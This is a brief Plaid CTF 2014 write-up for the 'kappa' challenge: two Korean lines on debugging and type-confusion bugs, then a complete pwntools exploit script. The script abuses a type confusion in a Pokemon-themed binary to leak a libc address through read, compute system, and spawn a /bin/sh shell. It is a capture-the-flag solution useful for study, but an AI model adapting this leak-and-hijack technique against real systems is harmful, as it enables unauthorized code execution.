Plaid CTF 2014 kappa

느낀점 : 퀴라를 열심히 써서 디버깅 하는 습관을 기르고 꺼진 불도 다시 보자.

타입 컨퓨전은 되게 생기기 쉬워보이지만 찾기는 어려울 것 같다.

from pwn import *

s = remote('localhost',4000)

elf = ELF('/home/cdor1/kappa')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

read_plt = elf.plt['read'] + 2
kakuna = 0x8048766
offset = libc.symbols['read'] - libc.symbols['system']

print "[*] read_plt : " + hex(read_plt)
print "[*] offset : " + hex(offset)
print "[*] KaKuna : " + hex(kakuna)

print s.recvuntil('5. Change Pokemon artwork')

for i in range(0,6):
	s.sendline('1')
	print s.recvuntil('5. Change Pokemon artwork')
	s.sendline('1')
	print s.recvuntil('3. Run')
	s.sendline('2')
	print s.recvuntil('What would you like to name this Pokemon?')
	s.sendline('cdor1')
	
	if(i>=4):
		s.sendline('5')

s.sendline('1')
print s.recvuntil('3. Run')

for i in range(0,4):
	s.sendline('1')
	print s.recvuntil('3. Run')

s.sendline('2')
print s.recvuntil('What would you like to name this Pokemon?')
s.send("/bin/sh\x00")
s.sendline('5')

print s.recvuntil('5. Change Pokemon artwork')
s.sendline('5')
print s.recvuntil('5. /bin/sh')

leak = "A"*509
leak += p32(read_plt)
leak += p32(kakuna)
leak += "A"*1624

s.sendline('5')
s.sendline(leak)
print s.recvuntil('5. Change Pokemon artwork')
s.sendline('3')
print s.recvuntil("Attack Power: 1094795585\nAttack: ")

read_libc = u32(s.recv(4))
system_libc = read_libc - offset

print "[*] read_libc : " + hex(read_libc)
print "[*] system_libc : " + hex(system_libc)

s.sendline('5')
print s.recvuntil('5. /bin/sh')

get_shell = "A"*513
get_shell += p32(system_libc)
get_shell += "A"*1624

s.sendline('5')
s.sendline(get_shell)

print s.recvuntil('5. Change Pokemon artwork')
s.sendline('3')
print s.recv(2048)
s.interactive()